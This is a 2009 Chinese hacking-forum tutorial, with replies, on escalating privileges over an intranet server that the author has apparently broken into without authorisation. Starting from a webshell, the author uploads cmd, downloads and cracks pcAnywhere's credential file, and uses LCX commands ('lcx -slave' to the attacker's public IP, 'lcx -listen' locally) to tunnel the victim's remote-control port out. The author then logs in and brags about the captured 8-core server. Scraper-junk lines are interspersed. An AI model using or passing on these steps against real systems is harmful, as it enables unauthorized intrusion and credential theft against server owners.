标题:
[原创文章]
pcanywhere之内网提权
[打印本页]
作者:
huar
时间:
2009-7-5 21:35
标题:
pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
! O1 _ c3 \% J3 k" I* O2 V9 y
. U4 v/ {4 M+ u* C% z( W5 Z8 }
提权方法:pcanywhere+LCX
# y, E/ h% v2 x, W, R. B! D
: V$ d5 b4 a: b0 w; j8 A
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
% { T4 Q1 C4 I' R2 X
H; O% ~ l# P. X
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
$ V) k, S) N& r* g+ e
" t, W4 D3 u# ?3 E7 p) O3 ]8 `
[attach]1548[/attach]
. d$ T4 [ u* L' s4 O" v9 n
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
4 {' }$ p% M( T* t3 ]) D/ r
3 W* y+ ]: r) t, c' E# b7 Y+ O1 A
[attach]1549[/attach]
) B/ d2 g A8 M- \# e$ w# s# |! J
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
4 B/ C/ L, e; g' r. \% A
. e1 X9 K4 s/ L+ a
[attach]1550[/attach]
8 J& \- D5 d2 \4 v F" w
( r' B6 b* k1 x7 c. s
[attach]1551[/attach]
+ p% W; H1 i9 Z6 p% g. C
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
8 x) D9 s, O/ I% K0 Q& a
' ?% r! ?8 E7 L7 H
[attach]1552[/attach]
8 `' H, J% v1 f1 }0 Y& e6 T
LCX的用法再简单说下:
$ \0 [* p1 M p. E: Y
- H* K) j8 Y# U1 w/ C0 _' A
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
6 H8 ?# D! O+ F' K F/ Y/ I+ J( I
3 d+ Z8 H* z- F2 y, k
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
1 c: o9 b- g) k2 ~
2 y: `' m1 J' Y& c2 s
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
5 w E% \7 |5 x) J7 K* l) { S
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
K. N% P0 H1 q; e1 Z7 O
- T' P0 `& q& J7 x1 Q7 r( Q' Q
[attach]1553[/attach]
2 K& y! Q( W9 D. C
U4 w7 p$ ~9 D) o; _
[attach]1554[/attach]
9 Y+ E6 [ | q5 t# c. e
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
( | ^# m% Z; \0 j! n
8 V" F/ F6 {. ?& d, \- q# c, T1 G
[attach]1555[/attach]
0 H7 k7 `. z+ |& `0 k0 [0 y
6 }$ M' g! o7 t3 W9 ]
[attach]1556[/attach]
# a; O/ k& r+ T0 W9 [" \
我们本地连接试试,输入我们刚破解的账号密码
) N- m, V/ o4 V1 H, ], i& i. k* O4 B
) {& j/ l$ l! O8 o( r% D- L
[attach]1557[/attach]
! I# D! D5 }/ I# m
呵呵``连接成功,服务器不错,又一个8核^︵^
9 T8 b7 a* h- y# ?" ?5 N3 S
$ X" y& z/ ~2 [. w
[attach]1558[/attach]
! f4 P% d" {6 d7 Z
8 U/ q; h0 F; B4 {9 W0 W; T
[attach]1559[/attach]
作者:
柔肠寸断
时间:
2009-7-5 21:37
不错不错。。。你的貌似一直都是内网服务器哈
作者:
huar
时间:
2009-7-5 21:41
哎。。。。运气不佳```老碰见内网的。。。。
作者:
gassiori
时间:
2009-7-6 09:50
八核的哟
作者:
柔肠寸断
时间:
2009-12-15 15:36
顶起。。。。。。。。。
作者:
killadmin
时间:
2010-1-21 20:01
但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2